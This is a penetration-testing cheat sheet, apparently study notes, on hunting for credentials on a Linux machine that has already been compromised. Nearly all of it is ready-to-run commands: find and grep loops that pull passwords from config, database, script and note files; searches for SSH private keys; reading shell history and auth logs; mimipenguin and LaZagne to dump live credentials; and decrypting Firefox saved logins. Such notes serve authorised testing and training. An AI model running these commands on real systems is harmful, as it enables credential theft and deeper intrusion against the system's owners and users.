Credential Hunting in Linux

Utilize when you have compromised a Linux Machine

🎯 Target Areas for Credential Hunting

Credential-related data can be found in many places. For efficiency, categorize your search:

🗃️ Files

Linux treats everything as a file, making files the primary hunting ground. Focus on:

Configuration Files (.conf, .config, .cnf)
Databases (.db, .sql)
Scripts (.sh, .py, etc.)
Notes (.txt or extension-less)
Cronjobs
SSH Keys

Finding Config Files

for l in $(echo ".conf .config .cnf"); do
  echo -e "\nFile extension: $l"
  find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core"
done

To find credentials within them:

for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib"); do
  echo -e "\nFile: $i"
  grep "user\|password\|pass" $i 2>/dev/null | grep -v "#"
done

🧩 Databases

Database files can contain stored credentials:

for l in $(echo ".sql .db .*db .db*"); do
  echo -e "\nDB File extension: $l"
  find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"
done

📝 Notes

Often contain sensitive access information:

find /home/* -type f -name "*.txt" -o ! -name "*.*"

⚙️ Scripts

Scripts can store hardcoded credentials:

for l in $(echo ".py .pyc .pl .go .jar .c .sh"); do
  echo -e "\nFile extension: $l"
  find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share"
done

⏰ Cronjobs

Check both system and user cronjobs:

cat /etc/crontab
ls -la /etc/cron.*/

🔑 SSH Keys

SSH private/public keys can allow system access:

Private Key Search

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

Public Key Search

grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

📜 History Files

Shell and command-line history can leak credentials:

tail -n5 /home/*/.bash*

📄 Logs

Logs can expose login attempts, sudo usage, and failures:

for i in $(ls /var/log/* 2>/dev/null); do
  GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=" $i 2>/dev/null)
  if [[ $GREP ]]; then
    echo -e "\n#### Log file: $i"
    echo "$GREP"
  fi
done

Memory (Live Creds)

Mimipenguin (Requires Root)

sudo python3 mimipenguin.py

LaZagne (Extensive Source Extraction)

sudo python2.7 laZagne.py all

Credential sources LaZagne targets include:

Wifi, Kwallet, Libsecret, CLI
Git, Env Vars, Grub, Docker
AWS, SSH, Shadow, Keepass
Chromium, Firefox, Thunderbird

Browsers

Firefox Credential Storage

Check stored profiles:

ls -l ~/.mozilla/firefox/ | grep default

Inspect login file:

cat ~/.mozilla/firefox/*default*/logins.json | jq .

Navigate to Mozilla FIrefox Directory

cd ~/.mozilla/firefox/ytb95ytb.default-release

Decrypt with Firefox Decrypt

python3.9 firefox_decrypt.py

LaZagne for Browsers

python3 laZagne.py browsers

PreviousLinux Local Password Attacks NextPasswd, Shadow & Opasswd in Linux

Last updated 9 months ago

hashtag🎯 Target Areas for Credential Hunting

hashtag🗃️ Files

hashtagFinding Config Files

hashtagTo find credentials within them:

hashtag🧩 Databases

hashtag📝 Notes

hashtag⚙️ Scripts

hashtag⏰ Cronjobs

hashtag🔑 SSH Keys

hashtagPrivate Key Search

hashtagPublic Key Search

hashtag📜 History Files

hashtag📄 Logs

hashtagMemory (Live Creds)

hashtagMimipenguinarrow-up-right (Requires Root)

hashtagLaZagne (Extensive Source Extraction)

hashtagBrowsers

hashtagFirefox Credential Storage

hashtagDecrypt with Firefox Decryptarrow-up-right

hashtagLaZagne for Browsers